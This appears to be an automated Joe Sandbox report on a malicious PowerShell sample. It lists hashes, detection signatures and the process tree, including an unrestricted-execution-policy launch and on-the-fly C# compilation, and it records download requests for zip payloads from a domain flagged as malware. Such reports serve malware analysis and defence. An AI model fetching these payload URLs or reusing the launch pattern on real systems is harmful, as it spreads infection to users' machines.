Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
m.txt.ps1

Overview

General Information

Sample name:m.txt.ps1
Analysis ID:1583788
MD5:d209d2e17ed62b29b2259d7fdc108e99
SHA1:d299eb8e04782a8b2922058dad8ace6264fd46d3
SHA256:140c357f592d4e1614584f1c753e1a9791bb27693d07fde44fe00d00da0923d4
Tags:ps1user-lontze7
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Sigma detected: Dot net compiler compiles file from suspicious location
Uses an obfuscated file name to hide its real file extension (double extension)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 7524 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD0D5.tmp" "c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7256INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4aa57:$b2: ::FromBase64String(
  • 0x4aa3d:$b3: ::UTF8.GetString(
  • 0x63201:$s1: -join
  • 0x6323c:$s1: -join
  • 0x632f6:$s1: -join
  • 0x63324:$s1: -join
  • 0x63488:$s1: -join
  • 0x634ab:$s1: -join
  • 0x63793:$s1: -join
  • 0x637b4:$s1: -join
  • 0x637e6:$s1: -join
  • 0x6382e:$s1: -join
  • 0x6385b:$s1: -join
  • 0x63882:$s1: -join
  • 0x638ad:$s1: -join
  • 0x638cf:$s1: -join
  • 0x6393e:$s1: -join
  • 0x63dc4:$s1: -join
  • 0x63de6:$s1: -join
  • 0x63e3e:$s1: -join
  • 0x63e68:$s1: -join

System Summary

barindex
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", ProcessId: 7256, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", ProcessId: 7492, ProcessName: csc.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", ProcessId: 7256, ProcessName: powershell.exe

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline", ProcessId: 7492, ProcessName: csc.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-03T15:21:20.075739+010028032742Potentially Bad Traffic192.168.2.849707172.67.212.107443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-03T15:21:19.277414+010018100002Potentially Bad Traffic192.168.2.849706172.67.212.107443TCP
2025-01-03T15:21:20.075739+010018100002Potentially Bad Traffic192.168.2.849707172.67.212.107443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zippAvira URL Cloud: Label: malware
Source: http://digitalarmor.cyouAvira URL Cloud: Label: malware
Source: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/grewg542.zipAvira URL Cloud: Label: malware
Source: https://digitalarmor.cyouAvira URL Cloud: Label: malware
Source: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zipAvira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Source: unknownHTTPS traffic detected: 172.67.212.107:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1529563538.0000027DCEC4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1529158000.0000027DCEBBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot source: powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1529563538.0000027DCEC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.pdb source: powershell.exe, 00000000.00000002.1507538284.0000027DB7EF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbu source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.pdbhP source: powershell.exe, 00000000.00000002.1507538284.0000027DB7EF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ws\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1529158000.0000027DCEBF6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49706 -> 172.67.212.107:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49707 -> 172.67.212.107:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 172.67.212.107:443
Source: global trafficHTTP traffic detected: GET /1234/bfoiuywh98ertyh/grewg542.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: digitalarmor.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /1234/bfoiuywh98ertyh/897654.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: digitalarmor.cyou
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /1234/bfoiuywh98ertyh/grewg542.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: digitalarmor.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /1234/bfoiuywh98ertyh/897654.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: digitalarmor.cyou
Source: global trafficDNS traffic detected: DNS query: digitalarmor.cyou
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 14:21:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcfyGYLRafD%2BrQtVI6m9FDA7W8fMT1mUtCZfpeZ05eCICqBEvDK63NVU6BBbPExbxhU2%2BsFpHGroTbHw1kUy1ShjfdPDMgGaDIlfE30jzc4eJwZV5s9tZ0NiPspzwDmQNL4%2BeA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc3a2732fdf8c93-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 14:21:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQYHCVVs8iMjq8hYeh9cqfEAT%2BBowAK4CY1NkOjUGRQ%2FoUNFIRaTOXq1GaxAM4RjvaglPEJ70CLxj9ljnqxGxuGlzrMd64nwwUgFqCgm9xDBt%2FsEfSmTV7lnrwREmzbKiNzITQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc3a278286c41d5-EWR
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB877A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalarmor.cyou
Source: powershell.exe, 00000000.00000002.1524880734.0000027DC6A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB68C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB68C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB8746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://digitalarmor.cyou
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zip
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zipp
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB7EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://digitalarmor.cyou/1234/bfoiuywh98ertyh/grewg542.zip
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB74F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1524880734.0000027DC6A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB87A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB89C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB89C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 172.67.212.107:443 -> 192.168.2.8:49706 version: TLS 1.2

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 7256, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4A255F850_2_00007FFB4A255F85
Source: Process Memory Space: powershell.exe PID: 7256, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal68.expl.evad.winPS1@6/11@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc50q0wx.xkn.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD0D5.tmp" "c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD0D5.tmp" "c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
